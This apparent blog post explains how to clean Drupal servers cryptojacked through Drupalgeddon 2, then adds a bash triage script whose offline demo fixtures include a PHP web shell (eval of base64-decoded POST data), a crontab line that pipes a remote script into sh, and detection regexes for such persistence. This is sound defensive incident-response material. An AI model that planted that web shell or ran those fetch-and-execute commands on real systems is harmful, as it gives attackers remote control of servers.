Attackers are exploiting the critical Drupalgeddon 2 vulnerability in Drupal to compromise servers and quietly turn them into cryptocurrency mining machines (cryptojacking), typically mining Monero.
The only side effect a victim might notice is that the system runs slower or works harder than usual (sustained high CPU load).
Drupal sites that have not been upgraded with the patch are still being hit.
The worst case is rebuilding your servers. If you are on shared hosting, your hosting provider will notify you and ask you to fix it, since a mining process violates their AUP ;)
So, if you don't choose to rebuild, the task is applying the security patch and cleaning up the system.
Here we go, understanding and cleaning:
Remote Code Execution - SA-CORE-2018-002 (Drupalgeddon 2) and SA-CORE-2018-004
Drupalgeddon 2 itself is SA-CORE-2018-002 (CVE-2018-7600), fixed in Drupal 7.58 / 8.5.1. The follow-up remote code execution SA-CORE-2018-004 (CVE-2018-7602) was fixed in Drupal 7.59 / 8.5.3, so upgrade to at least those releases.
Check that you have a backup of the Drupal site; your hosting provider (or you) should have backups going back at least one to three months. Pick one taken before the compromise (compare file timestamps), since a backup made after the attack carries the web shell with it. Restore it onto a separate server and keep that copy aside, both as a clean reference and as a fallback.
In parallel, run an anti-malware scan of the server with a tool such as BitDefender, looking specifically for web shells and other remote code execution artifacts. If you have penetration testing or vulnerability scanning tools, use those as well.
Upgrade Drupal to at least 7.59 / 8.5.3 (or whatever the latest release is)! Note that patching closes the door but does not remove anything the attacker already dropped; that is what the cleanup below is for.
- The cleanup decision is made based on the scan results.
- If only a small number of malicious or modified files turn up, delete them (or restore them from the clean backup).
- In particular, check for unexpected PHP files (including odd extensions such as .php5 or .phtml), entries added to the crontab of any user (including the web server's), and Perl scripts that run automatically; stop and remove those.
Look at the outgoing connections from the server (for example with ss -tnp or netstat -tnp). If you see suspicious URLs or activity, kill the processes behind them; if they come back, find what is restarting them (cron entries, init scripts, a watchdog process) and kill and remove that as well.
That's it. If you see no more activity, the site is clean. Schedule penetration tests or vulnerability scans regularly so that the next issue is caught early and is easy to fix.
The bad case is if you still see outgoing activity from the server after all that: then rebuilding the server (clean install plus a known-good backup of your content) is the option. Either way, change the database and Drupal admin passwords afterwards, since an RCE gives the attacker settings.php and everything in it.
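As an added example (not from the original post and not a Drupal project tool), here is a bash triage script that automates the checks above: it reads the core version from the docroot and compares it with the fixed releases, lists PHP/Perl files newer than a deploy marker, flags fetch-and-execute crontab lines, and prints established outbound connections to non-web ports from saved ss -tnp output. The docroot, crontab and socket listing are constructed samples (documentation IP addresses, an invented kthreadds process name) written to a temp directory so it runs offline; the function names and the deploy-marker file are my own choices, not anything Drupal ships.

```shell
#!/usr/bin/env bash
# Added triage helper for the Drupalgeddon cleanup steps. Not part of the original
# post and not a Drupal tool. The inputs below are constructed samples; on a real
# server pass your docroot, `crontab -l` output and `ss -tnp` output instead.
set -u

# --- 1. Is core still on a vulnerable release? --------------------------------
# Drupal 7 keeps its version in includes/bootstrap.inc, Drupal 8 in core/lib/Drupal.php.
drupal_version() {
  local root="$1"
  if [ -f "$root/core/lib/Drupal.php" ]; then
    sed -n "s/.*const VERSION = '\([0-9.]*\)'.*/\1/p" "$root/core/lib/Drupal.php"
  elif [ -f "$root/includes/bootstrap.inc" ]; then
    sed -n "s/.*define('VERSION', '\([0-9.]*\)').*/\1/p" "$root/includes/bootstrap.inc"
  fi
}

# True (exit 0) when dotted version $1 is older than $2. awk rather than sort -V
# so it also works on minimal/BusyBox hosts.
version_lt() {
  awk -v a="$1" -v b="$2" 'BEGIN {
    split(a, x, "."); split(b, y, ".")
    for (i = 1; i <= 3; i++) { if (x[i]+0 < y[i]+0) exit 0; if (x[i]+0 > y[i]+0) exit 1 }
    exit 1 }'
}

# Fixed releases: 7.59 / 8.5.3 / 8.4.8 (SA-CORE-2018-004), which also contain the
# earlier Drupalgeddon 2 fix from 7.58 / 8.5.1 / 8.4.6 (SA-CORE-2018-002).
patch_status() {
  local v="$1" fixed
  case "$v" in
    7.*)   fixed=7.59 ;;
    8.5.*) fixed=8.5.3 ;;
    8.4.*) fixed=8.4.8 ;;
    *)     echo "unknown"; return ;;
  esac
  if version_lt "$v" "$fixed"; then echo "vulnerable"; else echo "patched"; fi
}

# --- 2. PHP/Perl files newer than the last known-good deploy ------------------
# $2 is a reference file (deploy marker, or a file restored from the clean backup).
new_scripts() {
  find "$1" -type f \( -name '*.php' -o -name '*.php5' -o -name '*.phtml' -o -name '*.pl' \) -newer "$2"
}

# --- 3. Crontab lines that fetch-and-execute, the usual miner persistence -----
suspicious_cron() {
  grep -E -i '(curl|wget)[^|]*\|[[:space:]]*(ba)?sh|base64[[:space:]]+(-d|--decode)|/tmp/[^[:space:]]*\.(sh|pl)' "$1"
}

# --- 4. Established outbound connections to non-web ports, with owning process -
# Input is saved `ss -tnp` text; mining pools rarely sit on 80/443.
odd_outbound() {
  awk '$1 == "ESTAB" { n = split($5, p, ":"); port = p[n]
        if (port != "80" && port != "443") print $5, $6 }' "$1"
}

# --- Constructed demo inputs (not real data) ----------------------------------
DEMO=$(mktemp -d)
mkdir -p "$DEMO/site/includes" "$DEMO/site/sites/default/files"
printf "<?php\ndefine('VERSION', '7.57');\n" > "$DEMO/site/includes/bootstrap.inc"
printf "<?php // legitimate core file\n" > "$DEMO/site/index.php"
touch -t 201801010000 "$DEMO/site/includes/bootstrap.inc" "$DEMO/site/index.php"
touch -t 201803010000 "$DEMO/deploy-marker"
# a dropped web shell: newer than the deploy marker, hidden in the files dir
printf "<?php eval(base64_decode(\$_POST['c']));\n" > "$DEMO/site/sites/default/files/.cache.php"
cat > "$DEMO/crontab" <<'EOF'
0 3 * * * /usr/bin/drush --root=/var/www/site cron
*/10 * * * * curl -fsSL http://198.51.100.23/x.sh | sh
@reboot /tmp/.X11/update.pl
EOF
cat > "$DEMO/ss.txt" <<'EOF'
State Recv-Q Send-Q Local Address:Port   Peer Address:Port   Process
ESTAB 0      0      10.0.0.5:44122       93.184.216.34:443   users:(("php-fpm",pid=2210,fd=12))
ESTAB 0      0      10.0.0.5:51830       198.51.100.23:3333  users:(("kthreadds",pid=31337,fd=3))
LISTEN 0     128    0.0.0.0:22           0.0.0.0:*           users:(("sshd",pid=801,fd=3))
EOF

# --- Run the checks -----------------------------------------------------------
run_triage() {
  local root="$1" marker="$2" cron="$3" ss="$4"
  echo "core version : $(drupal_version "$root") -> $(patch_status "$(drupal_version "$root")")"
  echo "new scripts  :"; new_scripts "$root" "$marker"
  echo "cron entries :"; suspicious_cron "$cron" || echo "  (none)"
  echo "outbound     :"; odd_outbound "$ss"
}
run_triage "$DEMO/site" "$DEMO/deploy-marker" "$DEMO/crontab" "$DEMO/ss.txt"
```

On the demo data this reports core 7.57 as vulnerable, the hidden .cache.php as the only script newer than the deploy marker, the two download-and-run cron lines, and the kthreadds process talking to 198.51.100.23:3333. Anything the script lists is a lead, not a verdict: check the file contents and the process binary (ls -l /proc/PID/exe) before deleting, and re-run it after cleanup to confirm the outbound entry does not return.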